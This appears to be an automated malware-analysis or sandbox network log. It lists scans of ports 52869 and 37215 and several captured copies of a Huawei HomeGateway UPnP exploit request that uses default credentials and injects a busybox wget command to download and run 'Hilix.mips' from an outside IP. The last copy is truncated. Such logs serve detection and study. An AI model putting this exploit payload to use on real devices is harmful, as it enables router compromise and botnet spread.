Source: unknown	Network traffic detected: HTTP traffic on port 58596 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58596 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58596 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39908 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37414 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37414 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60204 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60208 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52738 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58596 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58508 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37414 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39908 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37414 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34670 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34680 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34742 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41400 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42850 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34742 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58596 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39908 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34742 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41654 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51620 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44520 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51628 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51620 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37414 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 39498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39502 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53696 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53160 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34742 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51620 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53706 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39908 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53160 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53160 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45424 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49110 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 33774
Source: unknown	Network traffic detected: HTTP traffic on port 45428 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 33780
Source: unknown	Network traffic detected: HTTP traffic on port 49118 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51620 -> 52869

Connects to many ports of the same IP (likely port scanning)

Source: global traffic	TCP traffic: 197.132.5.65 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 185.68.235.176 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 91.156.37.23 ports 2,5,6,8,9,52869

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 